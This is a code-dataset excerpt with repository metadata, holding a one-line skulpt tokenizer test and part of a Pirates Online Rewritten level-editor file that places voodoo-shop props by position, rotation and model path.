71d3813fc90c8d157d13e56a3cd6b93b7be4e173
| 20
|
py
|
Python
|
test/tokenize/t04.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
test/tokenize/t04.py
|
csev/skulpt
|
9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
test/tokenize/t04.py
|
csev/skulpt
|
9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
2134568 != 01231515
| 10
| 19
| 0.75
| 2
| 20
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.882353
| 0.15
| 20
| 1
| 20
| 20
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
71d43a9d17f352358b20172e52ba68296aa81bc8
| 49,513
|
py
|
Python
|
pirates/leveleditor/worldData/interior_shanty_store_voodoo_destruction.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 81
|
2018-04-08T18:14:24.000Z
|
2022-01-11T07:22:15.000Z
|
pirates/leveleditor/worldData/interior_shanty_store_voodoo_destruction.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 4
|
2018-09-13T20:41:22.000Z
|
2022-01-08T06:57:00.000Z
|
pirates/leveleditor/worldData/interior_shanty_store_voodoo_destruction.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 26
|
2018-05-26T12:49:27.000Z
|
2021-09-11T09:11:59.000Z
|
from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Objects': {'1156268617.43dzlu0s': {'Type': 'Building Interior','Name': '','Instanced': True,'Objects': {'1167851208.51kmuller': {'Type': 'Interior_furnishings','DisableCollision': True,'Holiday': '','Hpr': VBase3(-136.14, 0.0, 0.0),'Pos': Point3(38.83, -27.794, 0.0),'Scale': VBase3(1.296, 1.296, 1.296),'VisSize': '','Visual': {'Model': 'models/props/stove_potbelly'}},'1167851297.48kmuller': {'Type': 'Furniture','DisableCollision': False,'Hpr': VBase3(-91.525, 0.0, 0.0),'Pos': Point3(41.663, 3.579, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Color': (0.5199999809265137, 0.5199999809265137, 0.5299999713897705, 1.0),'Model': 'models/props/bench_shanty_2'}},'1167851350.63kmuller': {'Type': 'Furniture','DisableCollision': False,'Holiday': '','Hpr': VBase3(-42.586, 0.0, 0.0),'Pos': Point3(36.691, -21.999, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/table_shanty_2'}},'1167851586.93kmuller': {'Type': 'Prop_Groups','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(40.047, 18.369, 12.256),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/prop_group_A'}},'1167851649.96kmuller': {'Type': 'Prop_Groups','DisableCollision': True,'Holiday': '','Hpr': VBase3(-153.316, 0.0, 0.0),'Pos': Point3(25.487, 30.597, 12.073),'Scale': VBase3(0.837, 0.837, 0.837),'VisSize': '','Visual': {'Model': 'models/props/prop_group_A'}},'1167851807.53kmuller': {'Type': 'Crate','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-19.041, -25.093, 12.07),'Scale': VBase3(0.833, 0.833, 0.833),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/crates_group_1'}},'1167851894.7kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(-92.564, 0.0, 0.0),'Pos': Point3(-18.075, 12.111, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': 
(0.44999998807907104, 0.46000000834465027, 0.5099999904632568, 1.0),'Model': 'models/props/bookshelf_shanty'}},'1167851921.09kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(-92.564, 0.0, 0.0),'Pos': Point3(-19.447, -5.306, 0.009),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.3499999940395355, 0.3499999940395355, 0.4099999964237213, 1.0),'Model': 'models/props/bookshelf_shanty'}},'1167852002.85kmuller': {'Type': 'Prop_Groups','DisableCollision': True,'Holiday': '','Hpr': VBase3(-179.781, 0.0, 0.0),'Pos': Point3(-2.462, 27.995, 0.0),'Scale': VBase3(0.774, 0.774, 0.774),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/prop_group_G'}},'1167852037.59kmuller': {'Type': 'Prop_Groups','DisableCollision': True,'Holiday': '','Hpr': VBase3(-12.176, 0.0, 0.0),'Pos': Point3(-12.594, 26.107, 0.061),'Scale': VBase3(0.753, 0.753, 0.753),'VisSize': '','Visual': {'Color': (0.44999998807907104, 0.46000000834465027, 0.5099999904632568, 1.0),'Model': 'models/props/prop_group_B'}},'1167853082.76kmuller': {'Type': 'Sack','DisableCollision': True,'Holiday': '','Hpr': VBase3(91.224, 0.0, 0.0),'Pos': Point3(-18.405, -9.81, 12.07),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.8899999856948853, 0.8799999952316284, 0.7900000214576721, 1.0),'Model': 'models/props/sack_6stack'}},'1167853258.42kmuller': {'Type': 'Sack','DisableCollision': False,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(1.618, 29.269, 12.07),'Scale': VBase3(0.895, 0.895, 0.895),'Visual': {'Model': 'models/props/sack_6stack'}},'1167853323.74kmuller': {'Type': 'Sack','DisableCollision': True,'Holiday': '','Hpr': VBase3(3.126, 0.0, 0.0),'Pos': Point3(8.229, -24.205, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.44999998807907104, 0.46000000834465027, 0.5099999904632568, 1.0),'Model': 'models/props/sack_6stack'}},'1167853393.98kmuller': {'Type': 
'Sack','DisableCollision': True,'Hpr': VBase3(3.126, 0.0, 0.0),'Pos': Point3(8.544, -28.068, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Color': (0.3499999940395355, 0.3499999940395355, 0.4099999964237213, 1.0),'Model': 'models/props/sack_6stack'}},'1167853497.35kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(-51.848, 0.0, 0.0),'Objects': {'1181175917.18kmuller': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': '','Hpr': VBase3(-164.969, -74.63, 90.964),'Pos': Point3(-0.096, 1.166, 3.082),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/shop_voodoo_staff_skull'}}},'Pos': Point3(-13.006, -24.102, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/table_shanty'}},'1167853515.07kmuller': {'Type': 'Furniture','DisableCollision': False,'Holiday': '','Hpr': VBase3(123.732, -85.339, 42.813),'Pos': Point3(-14.045, -21.466, 0.556),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/chair_shanty'}},'1167854100.26kmuller': {'Type': 'Prop_Groups','DisableCollision': True,'Holiday': '','Hpr': VBase3(-28.429, 0.0, 0.0),'Pos': Point3(35.186, 24.898, 0.031),'Scale': VBase3(0.842, 0.842, 0.842),'VisSize': '','Visual': {'Model': 'models/props/prop_group_E'}},'1167867245.29kmuller': {'Type': 'Furniture','DisableCollision': False,'Holiday': '','Hpr': VBase3(-91.077, 0.0, 0.0),'Pos': Point3(41.052, 10.131, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/cabinet_shanty_low'}},'1167867305.85kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(-89.844, 0.0, 0.0),'Pos': Point3(-8.745, -7.978, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Model': 
'models/props/counter_shanty'}},'1167867328.81kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(-89.844, -80.671, 0.0),'Pos': Point3(-10.569, 2.486, 0.782),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/counter_shanty'}},'1167954371.88kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(179.241, 0.0, 0.0),'Pos': Point3(28.331, -30.189, 0.0),'Scale': VBase3(1.113, 1.113, 1.113),'VisSize': '','Visual': {'Model': 'models/props/cabinet_shanty'}},'1167954448.33kmuller': {'Type': 'Crate','DisableCollision': True,'Holiday': '','Hpr': VBase3(88.03, -32.883, 0.0),'Pos': Point3(24.319, -30.172, 0.751),'Scale': VBase3(0.745, 0.745, 0.745),'VisSize': '','Visual': {'Model': 'models/props/crate_04'}},'1167954476.21kmuller': {'Type': 'Crate','DisableCollision': True,'Holiday': '','Hpr': VBase3(148.456, 1.141, 94.314),'Pos': Point3(32.155, -27.087, 1.169),'Scale': VBase3(0.668, 0.668, 0.668),'VisSize': '','Visual': {'Color': (1.0, 0.8399999737739563, 0.6800000071525574, 1.0),'Model': 'models/props/crate_04'}},'1167954660.96kmuller': {'Type': 'Bucket','DisableCollision': True,'Holiday': '','Hpr': VBase3(-43.324, 0.098, -83.945),'Pos': Point3(27.913, -28.467, 0.699),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/bucket_handles'}},'1167954776.51kmuller': {'Type': 'ChickenCage','DisableCollision': True,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-19.38, 25.084, 12.07),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/props/ChickenCage'}},'1167954805.24kmuller': {'Type': 'Baskets','DisableCollision': True,'Hpr': VBase3(-44.57, 0.0, 0.0),'Pos': Point3(-18.486, -30.008, 12.07),'Scale': VBase3(1.111, 1.111, 1.111),'Visual': {'Color': (0.44999998807907104, 0.46000000834465027, 0.5099999904632568, 1.0),'Model': 'models/props/crab_pot'}},'1167957475.65kmuller': {'Type': 'Pots','DisableCollision': False,'Hpr': VBase3(0.0, 0.0, 
0.032),'Pos': Point3(38.63, -27.582, 4.366),'Scale': VBase3(1.512, 1.512, 1.512),'Visual': {'Model': 'models/props/pot_A'}},'1167957685.83kmuller': {'Type': 'Mortar_Pestle','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-8.401, -10.51, 3.597),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/mortar_pestle_stone'}},'1167957751.15kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(29.133, -29.639, 2.934),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/jar'}},'1167957802.44kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Hpr': VBase3(27.545, 0.0, 0.0),'Pos': Point3(30.06, -29.864, 2.928),'Scale': VBase3(1.095, 1.095, 1.095),'Visual': {'Model': 'models/props/jug'}},'1167957927.05kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Holiday': '','Hpr': VBase3(16.869, 0.0, 67.778),'Pos': Point3(26.048, -30.226, 3.103),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/largejug_A2'}},'1167958029.74kmuller': {'Type': 'ChickenCage','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(32.836, -29.562, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/ChickenCage'}},'1167958411.18kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Holiday': '','Hpr': VBase3(-106.543, 3.665, 87.489),'Pos': Point3(41.274, 6.311, 1.63),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/bottle_tan'}},'1167958482.3kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Holiday': '','Hpr': VBase3(33.03, -84.141, 7.662),'Pos': Point3(38.77, 10.792, 0.138),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6700000166893005, 0.7900000214576721, 0.7799999713897705, 1.0),'Model': 'models/props/bottle_red'}},'1167958587.96kmuller': {'Type': 'Furniture','DisableCollision': 
True,'Holiday': '','Hpr': VBase3(-179.115, 1.197, -91.865),'Pos': Point3(-11.512, -22.538, 0.682),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/chair_shanty'}},'1167958623.43kmuller': {'Type': 'Trunks','DisableCollision': True,'Hpr': VBase3(90.592, 0.0, 0.0),'Pos': Point3(-19.614, -7.705, 4.173),'Scale': VBase3(0.413, 0.413, 0.413),'Visual': {'Color': (0.44999998807907104, 0.46000000834465027, 0.5099999904632568, 1.0),'Model': 'models/props/Trunk_rounded_2'}},'1167958659.04kmuller': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-87.405, 0.0, 0.0),'Pos': Point3(-8.197, 6.748, 6.649),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/props/garlicString'}},'1167958695.37kmuller': {'Type': 'Food','DisableCollision': False,'Holiday': '','Hpr': VBase3(-136.259, 0.0, 0.0),'Pos': Point3(-7.714, 7.661, 7.328),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/garlicString'}},'1167958771.16kmuller': {'Type': 'Mortar_Pestle','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-18.641, 5.686, 3.543),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/mortar_pestle_wood'}},'1167958796.77kmuller': {'Type': 'Baskets','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(8.343, 18.358, 0.025),'Scale': VBase3(1.935, 1.935, 1.935),'VisSize': '','Visual': {'Color': (0.75, 1.0, 0.8500000238418579, 1.0),'Model': 'models/props/basket'}},'1167958843.83kmuller': {'Type': 'Bucket','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.0, -2.116, 0.0),'Pos': Point3(-14.994, 16.281, 0.416),'Scale': VBase3(0.57, 0.57, 0.57),'VisSize': '','Visual': {'Color': (0.49000000953674316, 0.47999998927116394, 0.4000000059604645, 1.0),'Model': 'models/props/washtub'}},'1167958939.32kmuller': {'Type': 'Bucket','DisableCollision': True,'Holiday': '','Hpr': VBase3(27.039, 0.0, 91.004),'Pos': Point3(-17.122, 17.622, 
0.785),'Scale': VBase3(0.882, 0.882, 0.882),'VisSize': '','Visual': {'Color': (0.7900000214576721, 0.7799999713897705, 0.699999988079071, 1.0),'Model': 'models/props/bucket'}},'1167959032.44kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, -80.41, 0.0),'Pos': Point3(-19.067, 8.691, 7.862),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/bottle_red'}},'1167959049.71kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Holiday': '','Hpr': VBase3(39.072, 0.0, 0.0),'Pos': Point3(-9.812, 7.522, -0.138),'Scale': VBase3(0.532, 0.532, 0.532),'VisSize': '','Visual': {'Model': 'models/props/jug_hanging'}},'1167959560.85kmuller': {'Type': 'Rock','DisableCollision': True,'Hpr': VBase3(-132.948, -87.154, 28.308),'Pos': Point3(-20.055, -3.188, 4.614),'Scale': VBase3(0.52, 0.52, 0.52),'Visual': {'Color': (0.44999998807907104, 0.46000000834465027, 0.5099999904632568, 1.0),'Model': 'models/props/rock_3_sphere'}},'1167959641.15kmuller': {'Type': 'Rock','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-19.784, -5.038, 4.017),'Scale': VBase3(0.222, 0.222, 0.222),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/props/rock_1_sphere'}},'1167971424.47kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(-15.109, 0.0, 0.0),'Pos': Point3(-14.762, 5.101, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/counter_shanty'}},'1167971619.35kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(1.035, -79.112, 0.0),'Pos': Point3(-15.951, -14.135, 0.986),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/counter_shanty'}},'1167971752.08kmuller': {'Type': 
'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(88.536, 0.0, 0.0),'Pos': Point3(-18.44, -0.45, 7.275),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/lamp_candle'}},'1167971774.92kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(179.787, 0.0, 0.0),'Pos': Point3(-6.136, -19.449, 6.634),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/lamp_candle'}},'1167971834.25kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(31.429, 20.834, 6.298),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/props/lamp_candle'}},'1174700283.27dzlu': {'Type': 'Light - Dynamic','Attenuation': '0.005','ConeAngle': '60.0000','DropOff': '0.0000','FlickRate': 0.5,'Flickering': True,'Hpr': VBase3(77.751, -26.68, 0.0),'Intensity': '0.9242','LightType': 'SPOT','Pos': Point3(56.329, -13.574, 20.382),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Color': (1, 1, 1, 1),'Model': 'models/props/light_tool_bulb'}},'1174700441.91dzlu': {'Type': 'Light - Dynamic','Attenuation': '0.005','ConeAngle': '60.0000','DropOff': '0.0000','FlickRate': '0.5000','Flickering': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Intensity': '0.2576','LightType': 'AMBIENT','Pos': Point3(24.384, 5.839, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1, 1, 1, 1),'Model': 'models/props/light_tool_bulb'}},'1181175670.12kmuller': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': '','Hpr': VBase3(37.818, 0.0, 0.0),'Pos': Point3(-15.26, 13.005, 0.083),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/shop_voodoo_doll'}},'1181175794.6kmuller': {'Type': 'Trunks','DisableCollision': True,'Hpr': VBase3(92.487, 0.0, 0.0),'Pos': Point3(-18.549, 10.268, 4.157),'Scale': VBase3(0.544, 0.544, 0.544),'Visual': {'Color': (0.43, 0.35, 0.35, 1.0),'Model': 
'models/props/Trunk_rounded_2'}},'1181175986.39kmuller': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(-8.064, -0.326, -177.7),'Pos': Point3(-5.778, -8.661, -0.069),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/shop_voodoo_doll'}},'1181176040.37kmuller': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': '','Hpr': VBase3(93.048, -0.857, -161.592),'Pos': Point3(-19.013, 5.848, 3.485),'Scale': VBase3(2.008, 2.008, 2.008),'VisSize': '','Visual': {'Model': 'models/props/shop_voodoo_staff'}},'1181244708.62kmuller': {'Type': 'Pots','DisableCollision': False,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-19.696, -2.637, 6.143),'Scale': VBase3(1.403, 1.403, 1.403),'Visual': {'Model': 'models/props/pot_A'}},'1185470127.76kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(-82.167, 0.0, 0.0),'Pos': Point3(26.198, 25.577, 11.808),'Scale': VBase3(1.165, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185470337.59kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(67.113, 0.0, 0.0),'Pos': Point3(-16.69, 24.259, 11.447),'Scale': VBase3(1.911, 1.0, 1.636),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185470390.84kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-18.653, -17.679, 11.718),'Scale': VBase3(1.0, 4.253, 1.264),'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_cube'}},'1185470441.36kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Hpr': VBase3(89.377, 0.0, 0.0),'Pos': Point3(-17.856, -29.514, 11.672),'Scale': VBase3(0.272, 1.0, 1.27),'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185470544.76kmuller': {'Type': 
'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(106.717, -87.866, 0.001),'Pos': Point3(39.583, -24.317, 0.841),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/chair_shanty'}},'1185470574.67kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(179.883, 0.0, 0.0),'Pos': Point3(-13.604, -20.389, -0.412),'Scale': VBase3(1.471, 1.0, 1.773),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185473733.65kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Hpr': VBase3(88.229, 0.0, 0.0),'Pos': Point3(-17.058, 13.357, 0.0),'Scale': VBase3(1.255, 1.255, 1.664),'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185473757.92kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(41.705, 0.0, 0.0),'Pos': Point3(-12.321, 18.847, -0.42),'Scale': VBase3(1.264, 1.0, 1.645),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185473855.14kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(86.357, 0.0, 0.0),'Pos': Point3(3.829, 27.413, 0.0),'Scale': VBase3(0.95, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185473892.76kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Hpr': VBase3(-29.531, 0.0, 0.0),'Pos': Point3(-8.525, 23.001, 0.0),'Scale': VBase3(0.481, 1.0, 1.568),'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185474062.46kmuller': {'Type': 'ChickenCage','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.063),'Pos': Point3(25.894, 29.446, 0.019),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/ChickenCage'}},'1185474078.9kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(-51.021, 0.0, 0.0),'Pos': Point3(26.971, 25.969, -0.117),'Scale': VBase3(1.107, 1.107, 
2.232),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185474160.92kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(36.854, 22.002, -0.231),'Scale': VBase3(1.0, 1.0, 2.21),'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1257882161.54caoconno': {'Type': 'Door Locator Node','Name': 'door_locator','Hpr': VBase3(90.0, 0.0, 0.0),'Pos': Point3(41.986, -7.423, 0.079),'Scale': VBase3(1.0, 1.0, 1.0)},'1257882301.33caoconno': {'Type': 'Holiday','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(-43.932, 0.0, 0.0),'Pos': Point3(-6.994, 7.717, 3.48),'Scale': VBase3(1.517, 1.517, 1.517),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_hol_decoStocking03_winter09'}},'1257882430.02caoconno': {'Type': 'Holiday','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(-43.932, 0.0, 0.0),'Pos': Point3(-7.031, -12.848, 3.48),'Scale': VBase3(1.517, 1.517, 1.517),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_hol_decoStocking03_winter09'}},'1257882492.33caoconno': {'Type': 'Holiday','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-8.027, -11.44, 3.571),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/props/pir_m_prp_hol_decoGift02_winter08'}},'1257882618.84caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(6.549, 5.998, 179.338),'Pos': Point3(4.826, 29.601, 4.248),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/shop_voodoo_staff'}},'1257882758.42caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(-13.217, -0.531, -177.739),'Pos': Point3(-2.132, -1.495, 
-0.01),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/shop_voodoo_doll'}},'1257882773.01caoconno': {'Type': 'Holiday','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(37.684, 0.0, 0.0),'Pos': Point3(-7.333, -9.409, -0.034),'Scale': VBase3(0.664, 0.664, 0.664),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_hol_decoGift04_winter08'}},'1257882905.81caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': '','Hpr': VBase3(90.389, 2.323, 179.984),'Pos': Point3(-20.753, -11.718, 4.108),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/shop_voodoo_staff'}},'1257883001.32caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(-174.593, 5.102, 177.677),'Pos': Point3(18.943, -29.771, 2.527),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/shop_voodoo_staff'}},'1257883095.16caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(6.549, 5.998, 179.338),'Pos': Point3(19.317, 29.434, 3.804),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/shop_voodoo_staff'}},'1257883215.54caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(32.075, -83.302, 2.871),'Pos': Point3(39.832, 0.97, -0.139),'Scale': VBase3(1.147, 1.147, 1.147),'VisSize': '','Visual': {'Model': 'models/props/shop_voodoo_staff_skull'}},'1257883292.66caoconno': {'Type': 
